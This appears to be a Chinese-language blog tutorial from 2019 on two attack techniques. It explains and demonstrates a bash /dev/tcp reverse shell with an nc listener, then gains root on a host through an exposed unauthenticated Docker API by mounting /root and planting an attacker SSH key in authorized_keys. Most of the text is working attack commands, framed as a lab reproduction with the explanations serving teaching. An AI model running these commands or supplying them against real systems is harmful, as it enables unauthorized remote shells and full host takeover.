shell反彈
2019/11/11 Chenxin
正常ssh連接與反彈shell連接說明
通過ssh xxx@xxxx,這就是正向連接。
而黑客不一樣,黑客是通過各種奇怪的方式進入了系統內部,這台電腦可能是在內網里面,沒有公開的IP地址,就跟家里的電腦一樣,沒有配置內網穿透,別人連接不到.這個時候,我們就要配置讓內網的電腦主動連接我們部署在外網的電腦,這也就是反彈shell。
具體步驟
1.在黑客的電腦192.168.3.227上起一個監聽的端口
yum install -y nc
nc -l -vv -p 1234
2.在被入侵的電腦里面,起一個反彈shell,這里我們就采用最經典的方式
命令為:
bash -i >& /dev/tcp/192.168.3.227/1234 0>&1
# 這句命令的意思是將本服務器上的所有輸入和輸出重定向到目標服務器3.227上。
說明:/dev/tcp/192.168.3.227代表新建了一個tcp的連接.0>&1 表示將標准輸入重定向到標准輸出中
就這樣在我們外網的主機,就接受到了受害者傳過來的shell,我們就可以進行任何的操作了。比如修改root密碼.
通過docker不當配置,提權
2019/11/11 Chenxin
docker的遠程訪問
一般來說,我們的docker應該是都放在內網里面,不會輕易對外暴露,但其實docker是可以開啟遠程訪問的,開啟遠程訪問的好處就是可以隨時操作,壞處就是處理不好也給了黑客可乘之機。下面先簡單介紹一下如何開啟遠程訪問docker.
這里我們采用的是18.06.0-ce版本。不同版本可能有不同的表現.
vim /etc/systemd/system/multi-user.target.wants/docker.service
# 添加
ExecStart=/usr/bin/dockerd --registry-mirror=https://rpwutt5n.mirror.aliyuncs.com -H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375
以上簡單的兩句即可開啟docker的遠程訪問,方便我們后面實驗的一些復現。
任意文件寫入(修改root公鑰,達到提權目的)
很多的人理解docker的方式是將docker理解成一個虛擬機,認為在docker里面的任何事情對於宿主機沒有危害,這其實是個誤區.我們通過實驗復現一下docker危險的地方.
1.進行真實主機提權
這個是docker很常見的功能,現在我們開啟了遠程訪問docker的功能。我們看一下能夠做什么.
1.1查看版本
docker -H tcp://192.168.31.215:2375 version
1.2遠程運行容器
docker -H tcp://192.168.31.215:2375 run --name mysql -p 3306:3306 -e MYSQL_ROOT_PASSWORD=123456 -v /root:/root -d mysql:5.6
我們掛載了一個root文件夾,因為docker很多時候是root權限,所以是可以往root文件夾寫入文件.
1.3進入容器
docker -H tcp://192.168.31.215:2375 exec -it mysql /bin/bash
1.4寫入公鑰
# mkdir .ssh
# cd .ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDm2HYqppANgDf9zxpulqLgoLfc....9GxkweW7NZq99pVUao/rHp5ONjZfwHJQ3kQsmm2phoR9USbicPvuk4AUuKw== axxxxxx@gamil.com" > authorized_keys
經過上面操作,我們往服務器真實主機寫入了公鑰,然后成功以root權限登錄了系統。